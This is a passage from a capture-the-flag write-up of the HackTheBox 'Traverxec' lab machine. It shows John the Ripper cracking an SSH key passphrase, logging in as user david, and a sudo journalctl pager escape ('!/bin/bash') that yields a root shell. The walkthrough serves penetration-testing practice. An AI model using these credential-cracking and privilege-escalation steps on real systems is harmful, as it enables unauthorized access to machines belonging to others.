0bec870f245bf94e646b72dc9604f5acefb6b28b838ba7d7caf0015fe7b8138970259a01b4793f36a32f0d379bf6d74d3a455b4dd15cda45adcfdf1517dca837cdaef08024fca3a7a7b9731e7474eddbdd0fad51cc7926dfbaef4d8ad47b1687278e7c7474f7eab7d4c5a7def35bfa97a44cf2cf4206b129f8b28003626b2b93f6d01aea16e3df597bc5b5138b61ea46f5e1cd15e378b8cb2e4ffe7995b7e7e52e35fd4ac6c34b716089d599e2d1d1124edfb6f7fe169222bc9c6a4f0b6731523d436ec2a15c6f147c40916aa8bc6168ccedb9ae263aaac078614f3fc0d2818dd30a5a113341e2fcccc73d421cb711d5d916d83bfe930c77f3f99dba9ed5cfcee020454ffc1b3830e7a1321c369380db6a61a757aee609d62343c80ac402ef8abd56616256238522c57e8db245d3ae1819bd01724f35e6b1c340d7f14c066c0432534938f5e3c115e120421f4d11c61e802a0796e6aaa5a7f1631d9ce4ca58d67460f3e5c1cdb2c5f6970cc598805abb386d652a0287577c453a159bfb76c6ad4daf65c07d386a3ff9ab111b26ec2e02e5b92e184e44066f6c7b88c42ce77aaa918d2e2d3519b4905f6e2395a47cad5e2cc3b7817b557df3babc30f799c4cd2f5a50b9f48fd06aaf435762062c4f331f989228a6460814c1c1a777795104143630dc16b79f51ae2dd9e008b4a5f6f52bb4ef38c8f5690e1b426557f2e068a9b3ef5b4fe842391b0af7d1e17bfa43e71b6bf16718d67184747c8dc1fcd1568d4b8ebdb6d55e62788553f4c69d128360b407db1d278b5b417f4c0a38b11163409b18372abb34685a30264cdfcf57655b10a283ff0

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯

Now that I have the hash it’s time to use John to decrypt and get the password.

# bash

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ john id_rsa-hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯

Looks good ! This enough I think, not it’s time to login with SSH with passphrase hunter.

# bash

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ ssh -v -i id_rsa david@10.10.10.165
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d  10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 10.10.10.165 [10.10.10.165] port 22.
debug1: Connection established.
debug1: identity file id_rsa type -1
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.9p1 Debian-10+deb10u1
debug1: match: OpenSSH_7.9p1 Debian-10+deb10u1 pat OpenSSH* compat 0x04000000
debug1: Authenticating to 10.10.10.165:22 as 'david'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo
debug1: Host '10.10.10.165' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:7
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa  explicit
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: id_rsa
Enter passphrase for key 'id_rsa': 
debug1: Authentication succeeded (publickey).
Authenticated to 10.10.10.165 ([10.10.10.165]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Remote: /home/david/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Fri Apr 10 19:06:53 2020 from 10.10.15.162
david@traverxec:~$ whoami
david


david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b[--------------------]82f3d
david@traverxec:~$

Privilege Escalation

JOURNALCTL

This part was tricky the user david is allowed to run with sudo command with journalctl which has privilege unto root, but when I try to run sudo -l it requesting for a password I think that was not the right thing to do. so I search about the journalctl and luckily I found it on GTFObins

HackTheBox-Traverxec

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo. so I examined first the file server-stats.head this is a HEAD file which is (another file in the bin directory) and some information about the server.

# bash

david@traverxec:~/bin$ cat server-stats.head
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

david@traverxec:~/bin$

The last line of server-stats.sh was very important. It runs sudo first, and then journalctl, which means journalctl is running with root privileges. Therefore, if we can control journalctl, we have root privileges. However, we cannot seem to change any parameters. When running anything sudo journalctl -n5 -unostromo.service other than that, a password will be required.

# bash

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$

running the server-stats.sh

# bash

david@traverxec:~/bin$ server-stats.sh
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

Load:  19:52:22 up 1 min,  1 user,  load average: 0.16, 0.09, 0.03
 
Open nhttpd sockets: 2
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Thurs 2020-04-09 19:50:59 EDT, end at Fri 2020-04-10 19:52:23 EDT. --
Apr 10 19:51:03 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Apr 10 19:51:03 traverxec nhttpd[459]: started
Apr 10 19:51:03 traverxec nhttpd[459]: max. file descriptors = 1040 (cur) / 1040 (max)
Apr 10 19:51:03 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header
david@traverxec:~/bin$

Get the ADMIN Shell

So this is the tricky part. I need to shrink my terminal size into small in order to execute !/bin/bash command and get the root.
first is I need to run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service which has root privileges, it’s something like this.

# bash
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

before we execute it I will change my terminal size into small like this.

HackTheBox-Traverxec

execute !/bin/bash command and finally I get the root shell and get the root.txt

after you go back the terminal size to normal it look like this.

# bash

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2020-04-10 19:50:59 EDT, end at Fri 2020-04-10 19:57:00 EDT. --
Apr 10 19:51:03 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/n
Apr 10 19:51:03 traverxec nhttpd[459]: started
Apr 10 19:51:03 traverxec nhttpd[459]: max. file descriptors = 1040 (cur) / 1040 (max)
Apr 10 19:51:03 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header
!/bin/bash
root@traverxec:/home/david/bin#

get the root.txt

# bash

root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9aa36[--------------------]0d906
root@traverxec:~#

If you liked my writeup please leave a respect on my Profile

Referrences:

nostromo 1.9.6 - Remote Code Execution

Nostromo Directory Traversal Remote Command Execution

GTFObins

.. / journalctl

Quick Summary

Penetration Testing Methodologies

Network Scanning

Walkthrough

Nmap results

Enumeration

Traverxec Website

Nostromo 1.9.6

Post - Exploitation

Enumerate Traverxec machine

Use Metasploit to Direct Access

Get in into the machine

WWW-DATA

Exploitation

HOME DIRECTORY

Decrypt SSH Key with ssh2john

Login with SSH and get user.txt

Privilege Escalation

JOURNALCTL

Get the ADMIN Shell